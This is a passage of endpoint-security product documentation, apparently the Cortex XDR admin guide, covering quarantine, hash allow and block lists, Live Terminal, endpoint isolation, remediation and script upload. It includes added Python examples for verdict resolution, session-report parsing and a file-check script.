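    def set_enabled(self, sha256: str, enabled: bool) -> None:
        """Disable (or re-enable) an entry without removing it from its list."""
        key = sha256.lower()
        entry = self.allow.get(key) or self.block.get(key)
        if entry is None:
            raise KeyError(key)
        entry.enabled = enabled

    def verdict(self, sha256: str, wildfire: Optional[str] = None,
                local_analysis: Optional[str] = None) -> Tuple[str, str]:
        """Resolve a file verdict in the priority order the guide gives.

        Returns (verdict, source). An enabled list entry overrides WildFire,
        which overrides local analysis; a disabled entry is skipped.
        """
        key = sha256.lower()
        entry = self.allow.get(key)
        if entry is not None and entry.enabled:
            return "benign", "allow list"
        entry = self.block.get(key)
        if entry is not None and entry.enabled:
            return "malware", "block list"
        if wildfire is not None:
            return wildfire, "WildFire"
        if local_analysis is not None:
            return local_analysis, "local analysis"
        return "unknown", "none"
```

The conflict check in add is the point worth copying: an allow list entry silently wins over every other source, so a hash that is already blocked should be moved deliberately rather than added a second time to the other list.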

STEP 1 | View the quarantined files in your network.

Navigate to Response > Action Center > Quarantine. Toggle between DETAILED and AGGREGATED
BY SHA256 views to display information on your quarantined files.

STEP 2 | Review details about quarantined files.


In the Detailed view, filter and review the Endpoint Name, Domain, File Path, Quarantine Source, and
Quarantine Date of all the quarantined files.
• Right-click one or more rows and select Restore all files by SHA256 to reinstate the selected files.

This will restore all files with the same hash on all of your endpoints.

• In the Hash field, right-click to:


• Open in VirusTotal—Review the quarantined file inspection results on VirusTotal. You will be
redirected in a new browser tab to the VirusTotal site and view all analysis details on the selected
quarantined file.
• Open Hash View—Drill down on each of the process executions, file operations, incidents, actions,
and threat intelligence reports relating to the hash.
• Open in Quick Launcher—Search for where the hash value appears in Cortex XDR.
• Export to file a detailed list of the quarantined hashes in a TSV format.
In the Aggregated by SHA256 view, filter and review the Hash, File Name, File Path, and Scope of all
the quarantined files.
• Right-click a row and select Additional Data to open the Quarantine Details page detailing the
Endpoint Name, Domain, File Path, Quarantine Source, and Quarantine Date of a specific file hash.
• Right-click and select Restore to reinstate one or more of the selected file hashes.
• In the Hash field, right-click to:
• Open in VirusTotal—Review the quarantined file inspection results on VirusTotal. You will be
redirected in a new browser tab to the VirusTotal site and view all analysis details on the selected
quarantined file.
• Open Hash View—Drill down on each of the process executions, file operations, incidents, actions,
and threat intelligence reports relating to the hash.
• Open in Quick Launcher—Search for where the hash value appears in Cortex XDR.

Review WildFire Analysis Details


For each file, Cortex XDR receives a file verdict and the WildFire Analysis Report. This report contains
the detailed sample information and behavior analysis in different sandbox environments, leading to the
WildFire verdict. You can use the report to assess whether the file poses a real threat on an endpoint. The
details in the WildFire analysis report for each event vary depending on the file type and the behavior of the
file.

• Drill down into the WildFire Analysis Details.
WildFire analysis details are available for files that receive a WildFire verdict. The Analysis Reports
section includes the WildFire analysis for each testing environment based on the observed behavior for
the file.
1. Open the WildFire report.
If you are analyzing an incident, right-click the incident and View Incident. From the Key Artifacts
involved in the incident, select the file for which you want to view the WildFire report and open ( ).
Alternatively, if you are analyzing an alert, right-click the alert and Analyze. You can open ( ) the
WildFire report of any file included in the alert Causality Chain.

Cortex XDR displays the preview of WildFire reports that were generated within the
last couple of years only. To view a report that was generated more than two years
ago, you can Download the WildFire report.
2. Analyze the WildFire report.
On the left side of the report you can see all the environments in which the Wildfire service tested
the sample. If a file is low risk and WildFire can easily determine that it is safe, only static analysis is
performed on the file. Select the testing environment on the left, for example Windows 7 x64 SP1,
to review the summary and additional details for that testing environment. To learn more about the
behavior summary, see WildFire Analysis Reports—Close Up.
3. (Optional) Download the WildFire report.

If you want to download the WildFire report as it was generated by the WildFire service, click ( ).
The report is downloaded in PDF format.

• Report an incorrect verdict to Palo Alto Networks.

If you know the WildFire verdict is incorrect, for example WildFire assigned a Malware verdict to a file
you wrote and know to be Benign, you can report an incorrect verdict to Palo Alto Networks to request
the verdict change.
1. Review the report information and verify the verdict that you are reporting.
2. Report ( ) the verdict to Palo Alto Networks.

3. Suggest a different Verdict for the hash.


4. Enter any details that may help us to better understand why you disagree with the verdict.
5. Enter an email address to receive an email notification after Palo Alto Networks completes the
additional analysis.
6. After you enter all the details, click OK.
From this point on, the threat team will perform further analysis on the sample to determine if it
should be reclassified. If a malware sample is determined to be safe, the signature for the file is
disabled in an upcoming antivirus signature update, or if a benign file is determined to be malicious, a
new signature is generated. After the investigation is complete, you will receive an email describing
the action that was taken.

Import File Hash Exceptions


The Action Center page displays information on files quarantined and included in the allow list and block
list. To import hashes from the Endpoint Security Manager or from external feeds, you can initiate an action.

STEP 1 | From Cortex XDR, select Response > Action Center > + New Action

STEP 2 | Select Import Hash Exceptions.

STEP 3 | Drag your Verdict_Override_Exports.csv file to the drop area.

If necessary, resolve any conflicts encountered during the upload and retry.

STEP 4 | Click Next twice.

STEP 5 | Review the action summary, and click Done.


Cortex XDR imports and then distributes your hashes to the allow list and block list based on the
assigned verdict.

Response Actions
During or after the investigation of malicious activity in your network, Cortex XDR offers various response
actions that enable you to investigate the endpoint and take immediate action to remediate it. For example,
when you detect a compromised endpoint, you can isolate it from your network to prevent it from
communicating with any other internal or external device, thereby reducing an attacker’s mobility on
your network. The available response actions in Cortex XDR are:
• Initiate a Live Terminal Session
• Isolate an Endpoint
• Run Scripts on an Endpoint
• Remediate Changes from Malicious Activity
• Search and Destroy Malicious Files
• Manage External Dynamic Lists
For response actions that rely on a Cortex XDR agent, the following table describes the supported platforms
and minimum agent version. A dash (—) indicates the action is not supported on that platform.

Module: Initiate a Live Terminal Session
Initiates a remote connection to an endpoint allowing you to investigate and respond to security events on
endpoints. Using Live Terminal you can navigate and manage files in the file system, manage active
processes, and run the operating system or Python commands.
Windows: Cortex XDR agent 6.1 and later
Mac: Cortex XDR agent 7.0 and later
Linux: Cortex XDR agent 7.0 and later

Module: Isolate an Endpoint
Halts all network access on the endpoint except for traffic to Cortex XDR to prevent a compromised
endpoint from communicating with any other internal or external device.
Windows: Cortex XDR agent 6.0 and later
Mac: Cortex XDR agent 7.3 and later on macOS 10.15.4 and later
Linux: —

Module: Run Scripts on an Endpoint
Allows executing Python 3.7 scripts on your endpoints directly from Cortex XDR, including pre-canned
scripts provided by Cortex XDR or your own Python scripts and code snippets.
Windows: Cortex XDR agent 7.1 and later
Mac: Cortex XDR agent 7.1 and later
Linux: Cortex XDR agent 7.1 and later

Module: Remediate Changes from Malicious Activity
Investigates suspicious causality process chains and incidents on your endpoints, and displays a list of
suggested actions to remediate processes, files and registry keys on your endpoint that were changed as a
result of malicious activity.
Windows: Cortex XDR agent 7.2 and later
Mac: —
Linux: —

Module: Search and Destroy Malicious Files
Searches for the presence of known and suspected malicious files on endpoints and destroys the file from
endpoints where it exists.
Windows: Cortex XDR agent 7.2 and later
Mac: Cortex XDR agent 7.3 and later on macOS 10.15.4 and later
Linux: —

Response actions are not supported for Android endpoints.

Initiate a Live Terminal Session


To investigate and respond to security events on endpoints, you can use the Live Terminal to initiate
a remote connection to an endpoint. The Cortex XDR agent facilitates the connection using a remote
procedure call. Live Terminal enables you to manage remote endpoints. Investigative and response actions
that you can perform include the ability to navigate and manage files in the file system, manage active
processes, and run the operating system or Python commands.
Live Terminal is supported for endpoints that meet the following requirements:

Operating System Requirements

Windows • Traps 6.1 or a later release


• Windows 7 SP1 or a later release
• Windows update patch for WinCRT (KB 2999226)—To verify the Hotfixes
that are installed on the endpoint, run the systeminfo command from a
command prompt.
• PowerShell 5.0 or a later release
• Endpoint activity reported within the last 90 minutes (as identified by the
Last Seen time stamp in the endpoint details).

Mac • Cortex XDR agent 7.0 or a later release


• macOS 10.12 or a later release
• Endpoint activity reported within the last 90 minutes (as identified by the
Last Seen time stamp in the endpoint details).


Linux • Cortex XDR agent 7.0 or a later release


• Any Linux supported release
• Endpoint activity reported within the last 90 minutes (as identified by the
Last Seen time stamp in the endpoint details).

If the endpoint supports the necessary requirements, you can initiate a Live Terminal session from the
Endpoints page. You can also initiate a Live Terminal as a response action from a security event. If the
endpoint is inactive or does not meet the requirements, the option is disabled.
After you terminate the Live Terminal session, you also have the option to save a log of the session activity.
All logged actions from the Live Terminal session are available for download as a text file report when you
close the live terminal session.
You can fine-tune the Live Terminal session visibility on the endpoint by adjusting the User Interface
options in your Agent Settings Profile.

STEP 1 | Start the session.


From a security event or endpoint details, select Response > Live Terminal. It can take the Cortex XDR
agent a few minutes to facilitate the connection.

STEP 2 | Use the Live Terminal to investigate and take action on the endpoint.
• Manage Processes
• Manage Files
• Run Operating System Commands
• Run Python Commands and Scripts

STEP 3 | When you are done, Disconnect the Live Terminal session.
You can optionally save a session report containing all activity you performed during the session.
The following example displays a sample session report:

Live Terminal Session Summary


Initiated by user [email protected] on target TrapsClient1 at
Jun 27th 2019 14:17:45

Jun 27th 2019 13:56:13 Live Terminal session has started [success]
Jun 27th 2019 14:00:45 Kill process calc.exe (4920) [success]
Jun 27th 2019 14:11:46 Live Terminal session end request [success]
Jun 27th 2019 14:11:47 Live Terminal session has ended [success]

No artifacts marked as interesting
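The session report above is the only record of what an administrator did on the endpoint, so it is worth parsing into structured events for audit (who ran a session on which host, what was killed, what failed). The following is an added example, not code from the guide or from Cortex XDR: it parses the header and the timestamped action lines of a report in the layout shown above into a dictionary and extracts the process terminations. The sample report is constructed (the user and target names are placeholders), and the handling of the artifacts section assumes only the "No artifacts marked as interesting" form the guide shows.

```python
import re
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample in the layout of the session report shown above. The user
# and target names are placeholders, not values from the guide.
SAMPLE_REPORT = """\
Live Terminal Session Summary

Initiated by user analyst@example.com on target WS-FINANCE-07 at
Jun 27th 2019 14:17:45

Jun 27th 2019 13:56:13 Live Terminal session has started [success]
Jun 27th 2019 14:00:45 Kill process calc.exe (4920) [success]
Jun 27th 2019 14:11:46 Live Terminal session end request [success]
Jun 27th 2019 14:11:47 Live Terminal session has ended [success]

No artifacts marked as interesting
"""

# Timestamps look like "Jun 27th 2019 14:00:45" (month, ordinal day, year, time).
TIMESTAMP = r"[A-Z][a-z]{2} \d{1,2}(?:st|nd|rd|th) \d{4} \d{2}:\d{2}:\d{2}"
HEADER_RE = re.compile(r"Initiated by user (\S+) on target (\S+) at\s+(" + TIMESTAMP + ")")
EVENT_RE = re.compile(r"^(" + TIMESTAMP + r") (.+?) \[(\w+)\]$")
KILL_RE = re.compile(r"^Kill process (.+?) \((\d+)\)$")


def parse_timestamp(text: str) -> datetime:
    """Turn 'Jun 27th 2019 14:00:45' into a datetime (ordinal suffix dropped)."""
    plain = re.sub(r"(\d)(st|nd|rd|th)\b", r"\1", text)
    return datetime.strptime(plain, "%b %d %Y %H:%M:%S")


def parse_session_report(text: str) -> Dict:
    """Parse the header and every timestamped action line of a session report."""
    header = HEADER_RE.search(text)
    if header is None:
        raise ValueError("missing 'Initiated by user ... on target ... at' header")
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append({"time": parse_timestamp(m.group(1)),
                           "action": m.group(2), "status": m.group(3)})
    return {
        "user": header.group(1),
        "target": header.group(2),
        "initiated_at": parse_timestamp(header.group(3)),
        "events": events,
        # Assumption: the guide only shows the "No artifacts marked as
        # interesting" form, so that is the only artifacts layout handled.
        "no_interesting_artifacts": "No artifacts marked as interesting" in text,
    }


def process_kills(report: Dict) -> List[Tuple[str, int]]:
    """List (process name, pid) for every successful Kill process action."""
    kills = []
    for ev in report["events"]:
        m = KILL_RE.match(ev["action"])
        if m and ev["status"] == "success":
            kills.append((m.group(1), int(m.group(2))))
    return kills


def failed_actions(report: Dict) -> List[str]:
    """Actions whose bracketed status is anything other than success."""
    return [ev["action"] for ev in report["events"] if ev["status"] != "success"]


def session_duration_seconds(report: Dict) -> int:
    """Seconds between the first and last logged action of the session."""
    times = [ev["time"] for ev in report["events"]]
    return int((max(times) - min(times)).total_seconds()) if times else 0


if __name__ == "__main__":
    r = parse_session_report(SAMPLE_REPORT)
    print(f"{r['user']} on {r['target']}: {len(r['events'])} actions, "
          f"{session_duration_seconds(r)} s, kills={process_kills(r)}")
```

Because the report is the only copy of the session (administrator actions are not saved to the endpoint, as noted under Manage Processes), feeding these parsed events into your own audit log keeps a record of remote actions even when the analyst chooses not to keep the text file.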

Manage Processes
From the Live Terminal you can monitor processes running on the endpoint. The Task Manager displays
the task attributes, owner, and resources used. If you discover an anomalous process while investigating
the cause of a security event, you can take immediate action to terminate the process or the whole process
tree, and block processes from running.

STEP 1 | From the Live Terminal session, open the Task Manager to navigate the active processes on
the endpoint.

You can toggle between a sorted list of processes and the default process tree view ( ). You can also
export the list of processes and process details to a comma-separated values file.
If the process is known malware, the row displays a red indicator and identifies the file using a malware
attribute.

STEP 2 | To take action on a process, right-click the process:


• Terminate process—Terminate the process or entire process tree.
• Suspend process—To stop an attack while investigating the cause, you can suspend a process or
process tree without killing it entirely.
• Resume process—Resume a suspended process.
• Open in VirusTotal—VirusTotal aggregates known malware from antivirus products and online scan
engines. You can scan a file using the VirusTotal scan service to check for false positives or verify
suspected malware.
• Get WildFire verdict—WildFire evaluates the file hash signature to compare it against known threats.
• Get file hash—Obtain the SHA256 hash value of the process.
• Download Binary—Download the file binary to your local host for further investigation and analysis.
You can download files up to 200MB in size.
• Mark as Interesting—Add an Interesting tag to a process to easily locate the process in the session
report after you end the session.
• Remove from Interesting—If no threats are found, you can remove the Interesting tag.
• Copy Value—Copy the cell value to your clipboard.

STEP 3 | Select Disconnect to end the Live Terminal session.


Choose whether to save the remote session report including files and tasks marked as interesting.
Administrator actions are not saved to the endpoint.

Manage Files
The File Explorer enables you to navigate the file system on the remote endpoint and take remedial action
to:
• Create, manage (move or delete), and download files, folders, and drives, including connected external
drives and devices such as USB drives and CD-ROM.

Network drives are not supported.

• View file attributes, creation and last modified dates, and the file owner.
• Investigate files for malicious content.
To navigate and manage files on a remote endpoint:

STEP 1 | From the Live Terminal session, open the File Explorer to navigate the file system on the
endpoint.

STEP 2 | Navigate the file directory on the endpoint and manage files.
To locate a specific file, you can:
• Search for a file name among the rows on the screen using the search bar.
• Double-click a folder to explore its contents.

STEP 3 | Perform basic management actions on a file.
• View file attributes
• Rename files and folders
• Export the table as a CSV file
• Move and delete files and folders

STEP 4 | Investigate files for malware.


Right-click a file to take investigative action. You can take the following actions:
• Open in VirusTotal—VirusTotal aggregates known malware from antivirus products and online scan
engines. You can scan a file using the VirusTotal scan service to check for false positives or verify
suspected malware.
• Get WildFire verdict—WildFire evaluates the file hash signature to compare it against known threats.
• Get file hash—Obtain the SHA256 hash value of the file.
• Download Binary—Download the file binary to your local host for further investigation and analysis.
You can download files up to 200MB in size.
• Mark as Interesting—Add an Interesting tag to any file or directory to easily locate the file. The files
you tag are recorded in the session report to help you locate them after you end the session.
• Remove from Interesting—If no threats are found, you can remove the Interesting tag.
• Copy Value—Copy the cell value to your clipboard.

STEP 5 | Select Disconnect to end the live terminal session.


Choose whether to save the live terminal session report including files and tasks marked as interesting.
Administrator actions are not saved to the endpoint.

Run Operating System Commands


The Live Terminal provides a command-line interface from which you can run operating system commands
on a remote endpoint. Each command runs independently and is not persistent. To chain multiple
commands so that they run as one action, join them with &&. For example:

cd c:\windows\temp\ && <command1> && <command2>

On Windows endpoints, you cannot run GUI-based cmd commands such as winver or appwiz.cpl.

STEP 1 | From the Live Terminal session, select Command Line.

STEP 2 | Run commands to manage the endpoint.
Examples include file management or launching batch files. You can enter or paste the commands, or
you can upload a script. After you are done, you can save the command session output to a file.

STEP 3 | When you are done, Disconnect the Live Terminal session.
Choose whether to save the live terminal session report including files and tasks marked as interesting.
Administrator actions are not saved to the endpoint.

Run Python Commands and Scripts


The Live Terminal provides a Python command line interface that you can use to run Python commands and
scripts.
The Python command interpreter uses Unix command syntax and supports Python 3 with standard Python
libraries. To issue Python commands or scripts on the endpoint, follow these steps:

STEP 1 | From the Live Terminal session, select Python to start the python command interpreter on the
remote endpoint.

STEP 2 | Run Python commands or scripts as desired.


You can enter or paste the commands, or you can upload a script. After you are done, you can save the
command session output to a file.

STEP 3 | When you are done, Disconnect the Live Terminal session.
Choose whether to save the live terminal session report including files and tasks marked as interesting.
Administrator actions are not saved to the endpoint.

Disable Live Terminal Sessions
If you want to prevent Cortex XDR from initiating Live Terminal remote sessions on an endpoint running
the Cortex XDR agent, you can disable this capability during agent installation or later on through Cortex
XDR Endpoint Administration. Disabling this capability is irreversible. If you later want to re-enable it
on the endpoint, you must re-install the Cortex XDR agent.

Disabling Live Terminal does not take effect on sessions that are in progress.

Isolate an Endpoint
When you isolate an endpoint, you halt all network access on the endpoint except for traffic to Cortex XDR.
This can prevent a compromised endpoint from communicating with other endpoints, thereby reducing
an attacker’s mobility on your network. After the Cortex XDR agent receives the instruction to isolate the
endpoint and carries out the action, the Cortex XDR console shows an Isolated check-in status. To ensure
an endpoint remains in isolation, agent upgrades are not available for isolated endpoints.
Network isolation is supported for endpoints that meet the following requirements:

Operating System    Prerequisites

Windows             • A Cortex XDR agent 6.0 or a later release
                    • (VDI) Configure your network isolation allow list in the Agent Settings Profile to
                      ensure VDI sessions remain uninterrupted.

Mac                 • A Cortex XDR agent 7.3 or a later release
                    • macOS 10.15.4 or a later release
                    • Ensure the Cortex XDR Network extension is enabled on the endpoint.
                    Network isolation on Mac endpoints does not terminate active connections that
                    were initiated before the Cortex XDR agent was installed on the endpoint.

STEP 1 | From Cortex XDR, initiate an action to isolate an endpoint.


Go to Response > Action Center > + New Action and select Isolate.
You can also initiate the action (for one or more endpoints) from the Isolation page of the Action Center
or from Endpoints > Endpoint Management > Endpoint Administration.

STEP 2 | Select Isolate.

STEP 3 | Enter a Comment to provide additional background or other information that explains why you
isolated the endpoint.
After you isolate an endpoint, Cortex XDR displays the Isolation Comment on the Action Center >
Isolation page. If needed, you can edit the comment from the right-click pivot menu.

STEP 4 | Click Next.

STEP 5 | Select the target endpoint that you want to isolate from your network.

If needed, Filter the list of endpoints. To learn how to use the Cortex XDR filters, refer to
Filter Page Results.

STEP 6 | Click Next.

STEP 7 | Review the action summary and click Done when finished.
In the next heartbeat, the agent will receive the isolation request from Cortex XDR.

STEP 8 | To track the status of an isolation action, select Response > Action Center > Isolation.
If, after initiating an isolation action, you want to cancel it, right-click the action and select Cancel for
pending endpoint. You can cancel the isolation action only if the endpoint is still in Pending status and
has not been isolated yet.

STEP 9 | After you remediate the endpoint, cancel endpoint isolation to resume normal communication.
You can cancel isolation from the Action Center (Isolation page) or from Endpoints > Endpoint
Management > Endpoint Administration. From either place, right-click the endpoint and select Endpoint
Control > Cancel Endpoint Isolation.

Remediate Changes from Malicious Activity
When investigating suspicious incidents and causality chains, you often need to restore and revert changes
made to your endpoints as a result of malicious activity. To avoid manually searching for the affected files
and registry keys on your endpoints, you can request remediation suggestions from Cortex XDR.
Cortex XDR investigates suspicious causality process chains and incidents on your endpoints and displays a
list of suggested actions to remediate processes, files, and registry keys on your endpoint.
To initiate remediation suggestions, you must meet the following requirements:
• Cortex XDR Pro per Endpoint license
• An App Administrator, Privileged Responder, or Privileged Security Admin role, whose permissions
include the remediation permissions
• EDR data collection enabled
• Cortex XDR agent version 7.2 or a later release on Windows endpoints

STEP 1 | Initiate a remediation analysis.


You can initiate a remediation suggestions analysis from either of the following places:
• In the Incident View, navigate to Actions > Remediation Suggestions.

Endpoints that are part of the incident view and do not meet the required criteria are
excluded from the remediation analysis.
• In the Causality View, either:
• Right-click any process node involved in the causality chain and select Remediation Suggestion.
• Navigate to Actions > Remediation Suggestions.
Analysis can take a few minutes. If desired, you can minimize the analysis pop-up while navigating to
other Cortex XDR pages.

STEP 2 | Review the remediation suggestion summary and details.

Field                               Description

ORIGINAL EVENT DESCRIPTION          Summary of the initial event that triggered the malicious causality chain.

ORIGINAL EVENT TIMESTAMP            Timestamp of the initial event that triggered the malicious causality chain.

ENDPOINT NAME                       Hostname of the endpoint.

IP ADDRESS                          The IP address associated with the endpoint.

ENDPOINT STATUS                     Connectivity status of the endpoint. One of:
                                    • Connected
                                    • Disconnected
                                    • Uninstalled
                                    • Connection lost

DOMAIN                              Domain or workgroup to which the endpoint belongs, if applicable.

ENDPOINT ID                         Unique ID assigned by Cortex XDR that identifies the endpoint.

SUGGESTED REMEDIATION               Action suggested by the Cortex XDR remediation scan to apply to the
                                    causality chain process:
                                    • Delete File
                                    • Restore File
                                    • Rename File
                                    • Delete Registry Value
                                    • Restore Registry Value
                                    • Terminate Process—Available when selecting Remediation Suggestions
                                      for a node in the Causality View.
                                    • Terminate Causality—Terminate the entire causality chain of processes
                                      that have been executed under the process tree of the listed Causality
                                      Group Owner (CGO) process name.
                                    • Manual Remediation—Requires you to take manual action to revert or
                                      restore.

SUGGESTED REMEDIATION DESCRIPTION   Summary of the remediation suggestion to apply to the file or registry.

REMEDIATION STATUS                  Status of the applied remediation:
                                    • Pending
                                    • In Progress
                                    • Failed
                                    • Completed Successfully
                                    • Partial Success

REMEDIATION DATE                    Timestamp of when all of the endpoint artifacts were remediated. If the
                                    remediation has not completed successfully, this field shows no timestamp.

STEP 3 | Select one or more Original Event Descriptions and right-click to Remediate.

STEP 4 | Track your remediation process.


1. Navigate to Response > Action Center > All Actions.
2. In the Action Type field, locate your remediation process.
3. Right-click Additional data to open the Detailed Results window.

Run Scripts on an Endpoint
For enhanced endpoint remediation and endpoint management, you can run Python 3.7 scripts on your
endpoints directly from Cortex XDR. For commonly used actions, Cortex XDR provides pre-canned scripts
you can use out of the box. You can also write and upload your own Python scripts and code snippets into
Cortex XDR for custom actions. Cortex XDR enables you to manage, run, and track the script execution on
the endpoints, as well as store and display the execution results per endpoint.
The following are prerequisites to executing scripts on your endpoints:
• Cortex XDR Pro Per Endpoint license
• Endpoints running the Cortex XDR agent 7.1 or a later release. Since the agent uses its built-in
capabilities and many available Python modules to execute the scripts, no additional setup is required on
the endpoint.
• Role in the hub with the following permissions to run and configure scripts:
• Run Standard scripts
• Run High-risk scripts
• Script configuration (required to upload a new script, run a snippet, and edit an existing script)
• Scripts (required to view the Scripts Library and the script execution results)

Running snippets requires both the Run High-risk scripts and Script configuration
permissions. Additionally, all scripts are executed as the System user on the endpoint.
Use the following workflow to start running scripts on your endpoints:
• Manage All Scripts in the Scripts Library
• Upload Your Scripts
• Run a Script on Your Endpoints
• Track Script Execution and View Results
• Troubleshoot Script Execution
• Disable Script Execution

Manage All Scripts in the Scripts Library
All your scripts are available in the Action Center > Scripts Library, including pre-canned scripts provided by
Palo Alto Networks and custom scripts that you uploaded. From the Scripts Library, you can view the script
code and metadata.
The following table describes both the default and additional optional fields that you can view in the Scripts
Library per script. The fields are in alphabetical order.

Field                 Description

Compatible OS         The operating systems the script is compatible with.

Created By            Name of the user who created the script. For pre-canned scripts, the user name is
                      Palo Alto Networks.

Description           The script description is an optional field that can be filled in when creating,
                      uploading, or editing a script.

Id                    Unique ID assigned by Cortex XDR that identifies the script.

Modification Date     Last date and time at which the script or its attributes were edited in Cortex XDR.

Name                  The script name is a mandatory field that can be filled in when creating, uploading,
                      or editing a script.

Outcome               • High-risk—Scripts that may potentially harm the endpoint.
                      • Standard—Scripts that do not have a harmful impact on the endpoint.

Script File SHA256    The SHA256 of the code file.

From the Scripts Library, you can perform the following additional actions:
• Download script—To see exactly what the script does, right-click and Download the Python code file
locally.
• View / Download definitions file—To view or download the script metadata, right-click the script and
select the relevant option.
• Run—To run the selected script, right-click and select Run. Cortex XDR redirects you to the Action
Center with the details of this script already populating the new action fields.
• Edit—To edit the script code or metadata, right-click and Edit. This option is not available for pre-
canned scripts provided by Palo Alto Networks.
By default, Palo Alto Networks provides you with a variety of pre-canned scripts that you can use out
of the box. You can view the script, download the script code and metadata, and duplicate the script;
however, you cannot edit the code or definitions of pre-canned scripts.
The following table lists the pre-canned scripts provided by Palo Alto Networks, in alphabetical order. New
pre-canned scripts are continuously uploaded into Cortex XDR through content updates, and are labeled
New for a period of three days.

Script name                  Description

delete_file                  Delete a file on the endpoint according to the full path.

file_exists                  Search for a specific file on the endpoint according to the full path.

get_process_list             List CPU and memory for all processes running on the endpoint.

list_directories             List all the directories under a specific path on the endpoint. You can limit
                             the number of levels you want to list.

process_kill_cpu             Set a minimum CPU value and kill all processes on the endpoint that are using
                             higher CPU.

process_kill_mem             Set a minimum RAM usage in bytes and kill all processes on the endpoint that
                             are using higher private memory.

process_kill_name            Kill all processes by a given name.

*registry_delete (Windows)   Delete a Registry key or value on the endpoint.

*registry_get (Windows)      Retrieve a Registry value from the endpoint.

*registry_set (Windows)      Set a Registry value on the endpoint.

*Since all scripts run under the System context, you cannot perform any Registry
operations on user-specific hives (HKEY_CURRENT_USER of a specific user).

Upload Your Scripts


You can write and upload additional scripts to the Scripts Library.
To upload a new script:

STEP 1 | From Action Center > Scripts Library select +New Script.

Drag and drop your script file, or browse and select it. During the upload, Cortex XDR parses your script
to ensure you are using only Python modules supported by Cortex XDR. Click Supported Modules if you
want to view the supported modules list. If your script is using unsupported Python modules, or if your
script is not using proper indentation, Cortex XDR will require that you fix it. You can use the editor to
update your script directly in Cortex XDR.

STEP 2 | Add meta-data to your script.


You can fill-in the fields manually, and also upload an existing definitions file in the supported format to
automatically fill-in some or all of the definition. To view the manifest format and create your own, see
Creating a Script Manifest.
• General—The general script definitions include: name and description, risk categorization, supported
operating systems, and timeout in seconds.

• Input—Set the starting execution point of your script code. To execute the script line by line, select
Just run. Alternatively, to set a specific function in the code as the entry point, select Run by entry
point. Select the function from the list, and specify for each function parameter its type.

• Output—If your script returns an output, Cortex XDR displays that information in the script results
table.
• Single parameter—If the script returns a single parameter, select the Output type from the list and
the output will be displayed as is. To detect the type automatically, select Auto Detect.
• Dictionary—If the script returns more than a single value, select Dictionary from the Output
type list. By default, Cortex XDR displays the dictionary value as is in the script results table. To
improve the script results table display and be able to filter according to the returned value, you
can assign a user-friendly name and type to some or all of your dictionary keys, and Cortex XDR
will use those in the results table instead.

To retrieve files from the endpoint, add the files_to_get key to the dictionary with an array of
endpoint paths; the files at those paths are retrieved from the endpoint.

STEP 3 | When you are done, Create the new script.


The new script is uploaded to the Scripts Library.
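The following Python 3 script is an added example that follows the upload conventions described in this section (an entry point function with typed parameters, a dictionary as the output, and the files_to_get key for file retrieval). It is not one of the pre-canned scripts and is not code from the Cortex XDR documentation. The entry point name check_file, its parameters path (string) and collect (boolean), and every result key except files_to_get are assumptions, as is the availability of os and hashlib on the supported modules list. The sample file that demo() creates is constructed so the script can be exercised offline.

```python
import hashlib
import os
import tempfile

# Added example, not a Palo Alto Networks pre-canned script. The entry point
# name, its parameters and all result keys except files_to_get are assumptions;
# os and hashlib are assumed to be on the supported modules list.


def _sha256_of(path, chunk_size=1024 * 1024):
    """Hash the file in chunks so a large binary never has to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_file(path, collect=False):
    """Entry point for 'Run by entry point'.

    Input parameters: path (string), collect (boolean).
    The return value is a dictionary, so the Output type is Dictionary; each
    key can be given a friendly name and type in the script definitions so the
    results table can filter on it. files_to_get is the key Cortex XDR reads to
    retrieve files, so it is filled only when the caller asked for the file and
    the file was actually readable.
    """
    result = {
        "exists": False,
        "is_file": False,
        "size_bytes": 0,
        "sha256": "",
        "error": "",
        "files_to_get": [],
    }
    if not os.path.exists(path):
        return result
    result["exists"] = True
    if not os.path.isfile(path):
        # Directories and device files are reported but never hashed or collected.
        return result
    result["is_file"] = True
    result["size_bytes"] = os.path.getsize(path)
    try:
        result["sha256"] = _sha256_of(path)
    except OSError as exc:
        # A locked or unreadable file (possible even as SYSTEM or root) should
        # yield a result row rather than an exception that marks the run Failed.
        result["error"] = str(exc)
        return result
    if collect:
        result["files_to_get"] = [path]
    return result


def demo():
    """Run the entry point against a constructed sample directory (offline)."""
    workdir = tempfile.mkdtemp()
    sample = os.path.join(workdir, "sample.txt")
    with open(sample, "wb") as fh:
        fh.write(b"hello")  # constructed sample content
    return {
        "present": check_file(sample, collect=True),
        "missing": check_file(os.path.join(workdir, "missing.txt")),
        "directory": check_file(workdir),
        "sample_path": sample,
    }
```

In the script definitions you would select Run by entry point, choose check_file, set path to string and collect to boolean, and give exists, sha256 and files_to_get friendly names and types so the results table can filter on them; the same definitions can be supplied as a manifest file (see Creating a Script Manifest). Returning an error key instead of raising keeps a single unreadable file from turning the whole endpoint row into a Failed status.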

Creating a Script Manifest
The script manifest file you upload into Cortex XDR has to be a single-line text file, in the exact format
explained below. If your file is structured differently, the manifest validation will fail and you will be required
to fix the file.

For the purpose of this example, we are showing each parameter on a new line. However,
when you create your file, you must remove any \n or \t characters.

This is an example of the manifest file structure and content:

{
  "name":"script name",
  "description":"script description",
  "outcome":"High Risk|Standard",
  "platform":"Windows,macOS,Linux",
  "timeout":600,
  "entry_point":"entry_point_name",
  "entry_point_definition":{
    "input_params":[
      {"name":"registry_hkey","type":"string"},
      {"name":"registry_key_path","type":"number"},
      {"name":"registry_value","type":"number"}],
    "output_params":{"type":"JSON","value":[
      {"name":"output_auto_detect","friendly_name":"name1","type":"auto_detect"},
      {"name":"output_boolean","friendly_name":"name2","type":"boolean"},
      {"name":"output_number","friendly_name":"name3","type":"number"},
      {"name":"output_string","friendly_name":"name4","type":"string"},
      {"name":"output_ip","friendly_name":"name5","type":"ip"}]
    }
  }
}

Always use lower case for variable names.

STEP 1 | Fill in the script name and description.
You can use letters and digits. Avoid the use of special characters.

STEP 2 | Categorize the script.
If a script is potentially harmful, set it as High Risk to limit the user roles that can run it. Otherwise,
set it as Standard.

STEP 3 | Assign the platform.
Enter the name of the operating system this script supports. The options are Windows, macOS, and
Linux. If you need to define more than one, use a comma as a separator.

STEP 4 | Set the script timeout.
Enter the number of seconds after which the Cortex XDR agent halts the script execution on the endpoint.

STEP 5 | Configure the script input and output.
